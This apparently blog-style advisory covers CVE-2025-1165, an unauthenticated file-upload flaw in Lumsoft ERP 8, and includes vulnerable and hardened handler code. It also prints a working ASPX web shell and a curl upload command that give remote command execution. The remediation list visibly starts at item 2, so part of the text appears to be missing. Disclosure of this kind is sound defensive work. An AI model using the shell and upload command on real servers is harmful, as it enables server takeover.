In early 2025, a severe security flaw—CVE-2025-1165—was discovered and disclosed in the well-known ERP software, Lumsoft ERP 8. This vulnerability exposes systems to full compromise by allowing anyone to upload arbitrary files via a web endpoint, with only basic HTTP access required.
Below, we break down what happened, show clear exploit code, and help you understand why you need to patch urgently.
What Is CVE-2025-1165?
CVE-2025-1165 is a critical vulnerability in Lumsoft ERP 8, specifically found in the DoUpload/DoWebUpload functionality of the file /Api/FileUploadApi.ashx. By manipulating the file argument in a POST request, an attacker can upload files without restriction—including potentially malicious executables or web shells.
Attackers do not need to be logged in. Anyone who knows the vulnerable endpoint can exploit it.
Technical Details
The vulnerable handler is at /Api/FileUploadApi.ashx. The functions DoUpload and DoWebUpload fail to properly validate or restrict the file types and paths that a user can upload.
Simplified vulnerable code (decompiled)
public void DoUpload(HttpContext context) {
    HttpPostedFile file = context.Request.Files["file"];
    // Client-supplied file name is used as-is, with no extension or path check.
    string path = context.Server.MapPath("~/UploadedFiles/" + file.FileName);
    file.SaveAs(path);
}
The handler performs no checks on:
- File extension (.aspx, .php, .exe)
- Path traversal (e.g., ../../)
- Authentication
This means an attacker can upload any file—including executable code for the server’s platform.
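A hardened replacement for the decompiled handler above, added here as an example and not taken from Lumsoft's code; the extension allow-list, the IHttpHandler wrapper, the upload folder and the HTTP status codes are assumptions. It adds the three missing checks in order: authentication, a deny-by-default extension allow-list, and traversal-safe path construction with a server-generated file name.

```csharp
using System;
using System.IO;
using System.Web;

// Hardened upload handler (added example, not Lumsoft's code).
// Assumptions: the allow-list below, the ~/UploadedFiles/ folder, and the status codes.
public class SafeFileUploadHandler : IHttpHandler
{
    // Deny by default: only non-executable document/image types are accepted.
    private static readonly string[] AllowedExtensions = { ".pdf", ".png", ".jpg", ".xlsx" };

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext context)
    {
        // 1. Authentication: the original handler accepted anonymous callers.
        if (context.User == null || !context.User.Identity.IsAuthenticated)
        {
            context.Response.StatusCode = 401;
            return;
        }

        HttpPostedFile file = context.Request.Files["file"];
        if (file == null || file.ContentLength == 0)
        {
            context.Response.StatusCode = 400;
            return;
        }

        // 2. Extension allow-list: never trust the client-supplied file name.
        string ext = Path.GetExtension(file.FileName).ToLowerInvariant();
        if (ext.Length == 0 || Array.IndexOf(AllowedExtensions, ext) < 0)
        {
            context.Response.StatusCode = 415;
            return;
        }

        // 3. Traversal-safe path: server-generated name, then verify the resolved
        //    path is still inside the upload root (defence in depth against "../").
        string uploadRoot = Path.GetFullPath(context.Server.MapPath("~/UploadedFiles/"));
        string safeName = Guid.NewGuid().ToString("N") + ext;
        string fullPath = Path.GetFullPath(Path.Combine(uploadRoot, safeName));
        if (!fullPath.StartsWith(uploadRoot, StringComparison.OrdinalIgnoreCase))
        {
            context.Response.StatusCode = 400;
            return;
        }

        file.SaveAs(fullPath);
        context.Response.StatusCode = 201;
    }
}
```

Independently of the code, the upload folder should have script execution disabled in IIS so that even a file that slips past the allow-list is served as static content rather than run as a page.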
Example web shell (Tiny.aspx)
<%@ Page Language="C#" %>
<% if (Request["cmd"] != null) {
System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
} %>
Exploit command using curl
curl -F "file=@Tiny.aspx" \
http://[victim-server]/Api/FileUploadApi.ashx?method=DoWebUpload
After upload, the attacker can access the shell at
http://[victim-server]/UploadedFiles/Tiny.aspx?cmd=whoami
This gives them instant remote command execution as the server’s user.
References and Public Disclosures
- NVD (CVE-2025-1165 entry)
- Exploit DB page for CVE-2025-1165
- GitHub PoC and writeup (public)
- Lumsoft’s advisory and patch: (link when available; check the vendor page)
2. Block access: Restrict exposure to this endpoint using firewalls or web server configuration.
3. Remove uploaded shells: Scan /UploadedFiles/ (or wherever user files are stored) for unexpected script files and delete them.
Conclusion
CVE-2025-1165 in Lumsoft ERP 8 is a classic, yet devastating example of failing to properly secure file upload endpoints. The public exploit code makes mass exploitation inevitable.
If you use Lumsoft ERP 8, update and secure your systems now. Don’t wait until intruders take advantage.
Timeline
Published on: 02/11/2025 01:15:09 UTC
Last modified on: 02/18/2025 18:15:30 UTC